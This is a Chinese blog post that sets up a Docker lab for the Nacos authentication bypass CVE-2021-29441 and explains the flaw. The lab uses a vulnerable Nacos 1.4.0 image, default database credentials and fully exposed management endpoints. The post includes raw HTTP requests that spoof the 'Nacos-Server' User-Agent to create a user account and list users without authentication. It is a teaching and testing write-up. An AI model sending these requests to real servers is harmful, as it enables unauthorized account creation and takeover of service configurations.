vlambda博客
学习文章列表

Nacos 权限绕过漏洞 (CVE-2021-29441)

1. 靶场搭建

docker-compose 启动容器

$docker-compose up -d

启动后访问 http://192.168.1.39:37090/nacos/#/login


配置文件
#docker-compose.yml
version: "2"
services:
  nacos:
    #image: nacos/nacos-server:1.4.0
    image: harbor.vackbot.com/vackbot/nacos/nacos-server:1.4.0
    container_name: nacos-standalone-mysql
    env_file:
      - ./env/nacos-standlone-mysql.env
    volumes:
      - ./standalone-logs/:/home/nacos/logs
      - ./init.d/vulnerabilities.properties:/home/nacos/init.d/custom.properties
    ports:
      - "37090:8848"
      - "37091:9848"
      - "37092:9555"
    depends_on:
      - mysql
    restart: on-failure
  mysql:
    container_name: mysql
    #image: nacos/nacos-mysql:5.7
    image: harbor.vackbot.com/vackbot/nacos/nacos-mysql:5.7
    env_file:
      - ./env/mysql.env
    volumes:
      - ./mysql:/var/lib/mysql
    ports:
      - "37093:3306"
# env/mysql.env
MYSQL_ROOT_PASSWORD=root
MYSQL_DATABASE=nacos_devtest
MYSQL_USER=nacos
MYSQL_PASSWORD=nacos
NACOS_AUTH_ENABLE=true

# env/nacos-standlone-mysql.env
PREFER_HOST_MODE=hostname
MODE=standalone
SPRING_DATASOURCE_PLATFORM=mysql
MYSQL_SERVICE_HOST=mysql
MYSQL_SERVICE_DB_NAME=nacos_devtest
MYSQL_SERVICE_PORT=3306
MYSQL_SERVICE_USER=nacos
MYSQL_SERVICE_PASSWORD=nacos
MYSQL_SERVICE_DB_PARAM=characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true&useSSL=false
NACOS_AUTH_ENABLE=true
# init.d/vulnerabilities.properties
#spring.security.enabled=false
#management.security=false
#security.basic.enabled=false
#nacos.security.ignore.urls=/**
#management.metrics.export.elastic.host=http://localhost:9200
# metrics for prometheus
management.endpoints.web.exposure.include=*
# metrics for elastic search
#management.metrics.export.elastic.enabled=false
#management.metrics.export.elastic.host=http://localhost:9200

# metrics for influx
#management.metrics.export.influx.enabled=false
#management.metrics.export.influx.db=springboot
#management.metrics.export.influx.uri=http://localhost:8086
#management.metrics.export.influx.auto-create-db=true
#management.metrics.export.influx.consistency=one
#management.metrics.export.influx.compressed=true



2. 漏洞详情

nacos是中国阿里巴巴(Alibaba)的一个动态服务发现、配置和服务管理平台。该软件支持基于 DNS 和基于 RPC 的服务发现,可提供提供实时健康检查,阻止服务向不健康的主机或服务实例发送请求等功能。

Nacos 存在安全漏洞,该漏洞源于允许Nacos服务器绕过过滤器,从而跳过身份验证检查。这种机制依赖于用户代理HTTP头,因此很容易被欺骗。

payload
'''
#添加账号
POST /nacos/v1/auth/users?username=aaaa&password=bbbb 
HTTP/1.1 2 Host: 192.168.1.2 
User-Agent: Nacos-Server 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 
DNT: 1 
Connection: close 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 0 


#查看用户:
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 
HTTP/1.1 
Host: 192.168.1.2 
User-Agent: Nacos-Server 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*; q=0.8 
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 
DNT: 1 
Connection: close
'''


漏洞链接:

https://nvd.nist.gov/vuln/detail/CVE-2021-29441

https://github.com/advisories/GHSA-36hp-jr8h-556f

https://github.com/chibd2000/myscan/blob/fb022f7ba1c94751f7a26192a079dcb979203f4a/exploit/web/Nacos/unauth.py


推荐阅读

PS4 11.0 自动越狱 玩客云刷机Armbian 完整教程 PS4 11.0 自动越狱 玩客云刷机Armbian 完整教程
nginx面试题-nginx和apache的区别 nginx面试题-nginx和apache的区别

相关文章